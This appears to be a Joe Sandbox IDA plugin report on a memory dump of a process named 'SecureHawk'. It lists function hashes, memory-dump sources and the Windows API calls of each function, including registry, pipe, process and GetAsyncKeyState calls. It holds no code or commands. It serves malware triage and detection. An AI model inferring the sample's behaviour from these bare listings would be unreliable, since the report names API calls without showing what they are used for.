                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                  • String ID: DllGetClassObject
                                  • API String ID: 753597075-1075368562
                                  • Opcode ID: b715034641b5ac00cb6cb9484a91876b0bbdfc75bd8ecd01b813a9610297e0c2
                                  • Instruction ID: 724c3c749291daf0a10b515d57cc74645be9666cd3764f70f027b21d5198f82b
                                  • Opcode Fuzzy Hash: b715034641b5ac00cb6cb9484a91876b0bbdfc75bd8ecd01b813a9610297e0c2
                                  • Instruction Fuzzy Hash: 64418CB1600605EFDB27DF64C984AAA7BB9EF45310F14C0A9EC099F205D7B5DD44CBA0
                                  APIs
                                  • _memset.LIBCMT ref: 00352DD3
                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00352DEF
                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00352E35
                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003B6890,00000000), ref: 00352E7E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Menu$Delete$InfoItem_memset
                                  • String ID: 0
                                  • API String ID: 1173514356-4108050209
                                  • Opcode ID: 23b8ae4522aa79698cac6c9ec0c9e2fcd3fcb946f10ef2767db68b2baa2f5bf9
                                  • Instruction ID: 1b249203889481a07e2d02477f2847fe6fc59db4776108e71300f2b5bd4f6b4f
                                  • Opcode Fuzzy Hash: 23b8ae4522aa79698cac6c9ec0c9e2fcd3fcb946f10ef2767db68b2baa2f5bf9
                                  • Instruction Fuzzy Hash: B54191312043419FDB26DF24C886F1BB7E8AF8A311F05461DFC659B2E1D770A909CBA2
                                  APIs
                                  • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0036DC76
                                    • Part of subcall function 00301462: _memmove.LIBCMT ref: 003014B0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: BuffCharLower_memmove
                                  • String ID: cdecl$none$stdcall$winapi
                                  • API String ID: 3425801089-567219261
                                  • Opcode ID: 696346e334a1ccfb7ccb4fa682825b35b01ad0401918e996474f5994c6ca0265
                                  • Instruction ID: 00e2dde6df5c6e0107ff93308057ec84318fee9ba6e124f0c51a889875b0fb2f
                                  • Opcode Fuzzy Hash: 696346e334a1ccfb7ccb4fa682825b35b01ad0401918e996474f5994c6ca0265
                                  • Instruction Fuzzy Hash: 2231AF70A00619AFCF06EF54CC918FEB3B9FF55310B108629E8269B6D5DB71AD05CB80
                                  APIs
                                    • Part of subcall function 00301A36: _memmove.LIBCMT ref: 00301A77
                                    • Part of subcall function 0034B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0034B5A0
                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003498AF
                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 003498C2
                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 003498F2
                                    • Part of subcall function 00301821: _memmove.LIBCMT ref: 0030185B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessageSend$_memmove$ClassName
                                  • String ID: ComboBox$ListBox
                                  • API String ID: 365058703-1403004172
                                  • Opcode ID: 6996a5ab04abfe6d2c637f07da39121f898d45b6dd3a36a1f01fc8f7d34ee821
                                  • Instruction ID: b01be2e6eeefd91607782bb8f827e4ea8b3440b67aa771fcdde3f50c8760d9dc
                                  • Opcode Fuzzy Hash: 6996a5ab04abfe6d2c637f07da39121f898d45b6dd3a36a1f01fc8f7d34ee821
                                  • Instruction Fuzzy Hash: FE213571A41108BEEB1AABA0CC96DFFB7ACDF46360F10411AF8219F2E1DB345D099720
                                  APIs
                                    • Part of subcall function 002F2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002F214F
                                    • Part of subcall function 002F2111: GetStockObject.GDI32(00000011), ref: 002F2163
                                    • Part of subcall function 002F2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 002F216D
                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0037684E
                                  • LoadLibraryW.KERNEL32(?), ref: 00376855
                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0037686A
                                  • DestroyWindow.USER32(?), ref: 00376872
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                  • String ID: SysAnimate32
                                  • API String ID: 4146253029-1011021900
                                  • Opcode ID: 33290c1ae8ded9fdf4769324fb024cf91e406536e7a60308d65ec355cb408cfc
                                  • Instruction ID: de2e48afa66c1ff2b3983bc7543e6d54dea520d651aceded1041e2c7eba5465a
                                  • Opcode Fuzzy Hash: 33290c1ae8ded9fdf4769324fb024cf91e406536e7a60308d65ec355cb408cfc
                                  • Instruction Fuzzy Hash: 3421F271200A06BFEF224F74CCA2EBB33ADEF49368F118628FA1892090D735CC519721
                                  APIs
                                  • GetStdHandle.KERNEL32(0000000C), ref: 003571E4
                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00357217
                                  • GetStdHandle.KERNEL32(0000000C), ref: 00357229
                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00357263
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CreateHandle$FilePipe
                                  • String ID: nul
                                  • API String ID: 4209266947-2873401336
                                  • Opcode ID: b8311a0d55bdf99ec4ecf5dc2ab2d7c927bd2d36d010e25ab31bd128aa33a268
                                  • Instruction ID: 7dbb807ba493b96b799ef8f6a710dd7b54d1f8ca873ce06f373fb3ab7c370f16
                                  • Opcode Fuzzy Hash: b8311a0d55bdf99ec4ecf5dc2ab2d7c927bd2d36d010e25ab31bd128aa33a268
                                  • Instruction Fuzzy Hash: C121B371504306ABDB229F28EC05E9A77F8BF45722F204A59FCB0D72E0DB709949CB60
                                  APIs
                                  • GetStdHandle.KERNEL32(000000F6), ref: 003572B1
                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003572E3
                                  • GetStdHandle.KERNEL32(000000F6), ref: 003572F4
                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 0035732E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CreateHandle$FilePipe
                                  • String ID: nul
                                  • API String ID: 4209266947-2873401336
                                  • Opcode ID: aa2670ff8ca0b696549d81e64458bd31a7c185d13cbaa41cf6e830e0a584ccf0
                                  • Instruction ID: 937b7bc3f0f5a68a2d117e696bf593357e1b79c8ee6ec4a99f919942e4addf74
                                  • Opcode Fuzzy Hash: aa2670ff8ca0b696549d81e64458bd31a7c185d13cbaa41cf6e830e0a584ccf0
                                  • Instruction Fuzzy Hash: E6218E75508305ABDB229F69E809EA977ECAF55731F200E19FCA0E72E0D7719848CB61
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 0035B104
                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0035B158
                                  • __swprintf.LIBCMT ref: 0035B171
                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,00380980), ref: 0035B1AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ErrorMode$InformationVolume__swprintf
                                  • String ID: %lu
                                  • API String ID: 3164766367-685833217
                                  • Opcode ID: aa307e309b79b611abd574abc746354970c327fd891251d9b7235137e8b00097
                                  • Instruction ID: d2bb42c497923f117abd1a794d4416ef0ebd09556fa67ea503db5c148baadd37
                                  • Opcode Fuzzy Hash: aa307e309b79b611abd574abc746354970c327fd891251d9b7235137e8b00097
                                  • Instruction Fuzzy Hash: 25217134A00208AFCB51EF64CD85DEEB7B8EF89314F1040A9F909EB251DB71EA45CB61
                                  APIs
                                    • Part of subcall function 00301821: _memmove.LIBCMT ref: 0030185B
                                    • Part of subcall function 0034A835: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0034A852
                                    • Part of subcall function 0034A835: GetWindowThreadProcessId.USER32(?,00000000), ref: 0034A865
                                    • Part of subcall function 0034A835: GetCurrentThreadId.KERNEL32 ref: 0034A86C
                                    • Part of subcall function 0034A835: AttachThreadInput.USER32(00000000), ref: 0034A873
                                  • GetFocus.USER32 ref: 0034AA0D
                                    • Part of subcall function 0034A87E: GetParent.USER32(?), ref: 0034A88C
                                  • GetClassNameW.USER32(?,?,00000100), ref: 0034AA56
                                  • EnumChildWindows.USER32(?,0034AACE), ref: 0034AA7E
                                  • __swprintf.LIBCMT ref: 0034AA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                  • String ID: %s%d
                                  • API String ID: 1941087503-1110647743
                                  • Opcode ID: 99444a82112dda17a708fab04e1dda029136321720af5ed649e9686393cb4ef8
                                  • Instruction ID: 2e7f2cb3ffbdd80957d6cd08daf6c27c68fcde8fcb1232b30303254c25c0edd2
                                  • Opcode Fuzzy Hash: 99444a82112dda17a708fab04e1dda029136321720af5ed649e9686393cb4ef8
                                  • Instruction Fuzzy Hash: 45116071640205ABDB56BFA0CD85FEA7BACEF48700F0440A9FE18AE182DA716945CB71
                                  APIs
                                  • CharUpperBuffW.USER32(?,?), ref: 00352184
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: BuffCharUpper
                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                  • API String ID: 3964851224-769500911
                                  • Opcode ID: b280bc1d32bceb0a1c585cafe47f276ea08c303ff7e36ffbee68a3208ad095d4
                                  • Instruction ID: baf94f4df375c66dda5793e66c83abccbead186e7dbe91ba98ce73c1dc167f9f
                                  • Opcode Fuzzy Hash: b280bc1d32bceb0a1c585cafe47f276ea08c303ff7e36ffbee68a3208ad095d4
                                  • Instruction Fuzzy Hash: C41170349001088F8F0AEF54C8529FEB775FF5A304B504155DC26AB252DB725D4ACF80
                                  APIs
                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0036F0B8
                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0036F0E8
                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0036F21B
                                  • CloseHandle.KERNEL32(?), ref: 0036F29C
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                  • String ID:
                                  • API String ID: 2364364464-0
                                  • Opcode ID: 711000ce0cc6029d161d94b8fe41be0b858aa049feb228186ab7fdb099595ec9
                                  • Instruction ID: 893621b617d10f9a2f8ccef7d36479aaa6ea2938fa925e2f3edca5a72fa068e7
                                  • Opcode Fuzzy Hash: 711000ce0cc6029d161d94b8fe41be0b858aa049feb228186ab7fdb099595ec9
                                  • Instruction Fuzzy Hash: 4D818F756103009FD721EF28E882B3BF7E5AF48750F14892DFA999B292D7B0AD148F51
                                  APIs
                                    • Part of subcall function 00301A36: _memmove.LIBCMT ref: 00301A77
                                    • Part of subcall function 00371242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003701D5,?,?), ref: 00371259
                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00370525
                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00370564
                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003705AB
                                  • RegCloseKey.ADVAPI32(?,?), ref: 003705D7
                                  • RegCloseKey.ADVAPI32(00000000), ref: 003705E4
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                  • String ID:
                                  • API String ID: 3440857362-0
                                  • Opcode ID: f9c4f9d57aba5936c920b3c3b03be525d4c757609a4ba6888b4e19df793a7395
                                  • Instruction ID: a8ca54f6b4d3c2cad591f183b9019fefc2eba4f6fbfa5a419ac6349fead790ef
                                  • Opcode Fuzzy Hash: f9c4f9d57aba5936c920b3c3b03be525d4c757609a4ba6888b4e19df793a7395
                                  • Instruction Fuzzy Hash: 61514A71218204AFD71AEF64C891E6BB7E8FF85354F00891DF5998B292DB74E908CB52
                                  APIs
                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0035EACF
                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0035EAF8
                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0035EB37
                                    • Part of subcall function 002F4D37: __itow.LIBCMT ref: 002F4D62
                                    • Part of subcall function 002F4D37: __swprintf.LIBCMT ref: 002F4DAC
                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0035EB5C
                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0035EB64
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                  • String ID:
                                  • API String ID: 1389676194-0
                                  • Opcode ID: 3bfb2d288745ea5606b01cec86bc313408b29a88844ac54900bbece17e4ecca1
                                  • Instruction ID: 03c415072ea0efe49f0b846ebf29f2b57076fad8065e4f4c11536cfff38b4c92
                                  • Opcode Fuzzy Hash: 3bfb2d288745ea5606b01cec86bc313408b29a88844ac54900bbece17e4ecca1
                                  • Instruction Fuzzy Hash: 0F514D35A00209DFCB06EF64C981DAEBBF5EF08315B1480A9E949AB361CB71ED55DF50
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cae514d5fe47af0df1bfef53ba6f9a33e812d8354373b7f5493f36f8017cac39
                                  • Instruction ID: f4078894ff7f88e173847f77f45fdfc1b1503212a1c18ec79ea4f26e642361b0
                                  • Opcode Fuzzy Hash: cae514d5fe47af0df1bfef53ba6f9a33e812d8354373b7f5493f36f8017cac39
                                  • Instruction Fuzzy Hash: 0941F435904604AFC732DF28CC48FADBBA8FB8A320F168155F95DA72D1D6789E40DB52
                                  APIs
                                  • GetCursorPos.USER32(?), ref: 002F2727
                                  • ScreenToClient.USER32(003B67B0,?), ref: 002F2744
                                  • GetAsyncKeyState.USER32(00000001), ref: 002F2769
                                  • GetAsyncKeyState.USER32(00000002), ref: 002F2777
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: AsyncState$ClientCursorScreen
                                  • String ID:
                                  • API String ID: 4210589936-0
                                  • Opcode ID: 05b52100d7c722d0ce2946ffea0ca06646e1a6c3e67c82703f2207f713aa4941
                                  • Instruction ID: 5a1946424e2573ac0211f520fe5845cbf55bca245698a5483551b7ec63763861
                                  • Opcode Fuzzy Hash: 05b52100d7c722d0ce2946ffea0ca06646e1a6c3e67c82703f2207f713aa4941
                                  • Instruction Fuzzy Hash: 9A414D75514219FBDF1A9FA4C844AFDFB74FB06360F20436AF92896290CB30A964DF91
                                  APIs
                                  • GetWindowRect.USER32(?,?), ref: 003493CB
                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00349475
                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0034947D
                                  • PostMessageW.USER32(?,00000202,00000000), ref: 0034948B
                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00349493
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessagePostSleep$RectWindow
                                  • String ID:
                                  • API String ID: 3382505437-0
                                  • Opcode ID: 5da5572654513e505b49f48a39fb875282b13eb711a2b469be7b992e1f7cebbe
                                  • Instruction ID: 54a26c9d73a8bde018a6a4c6e5332c6eac7db0eb52c5d33558c75622c7801ddd
                                  • Opcode Fuzzy Hash: 5da5572654513e505b49f48a39fb875282b13eb711a2b469be7b992e1f7cebbe
                                  • Instruction Fuzzy Hash: 6631EE71500219EFDF15CFA8DD4CB9E7BB9EB45325F10826AF924AA2D0C3B0A914CB90
                                  APIs
                                  • IsWindowVisible.USER32(?), ref: 0034BB80
                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0034BB9D
                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0034BBD5
                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0034BBFB
                                  • _wcsstr.LIBCMT ref: 0034BC05
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                  • String ID:
                                  • API String ID: 3902887630-0
                                  • Opcode ID: 9eb9953f3df5e8238111101cd84d31eb4bacef87df1f084c80743f48427d6d2a
                                  • Instruction ID: 27c6e207f04e54aab95af29ad0b6da55f4a29aa506082177e938f6a84462117a
                                  • Opcode Fuzzy Hash: 9eb9953f3df5e8238111101cd84d31eb4bacef87df1f084c80743f48427d6d2a
                                  • Instruction Fuzzy Hash: 8621D731604204BBEB2F5B699C85A7BBBECDF49720F014169F805CE151EFA1EC9197A0
                                  APIs
                                    • Part of subcall function 002F29E2: GetWindowLongW.USER32(?,000000EB), ref: 002F29F3
                                  • GetWindowLongW.USER32(?,000000F0), ref: 0037B57F
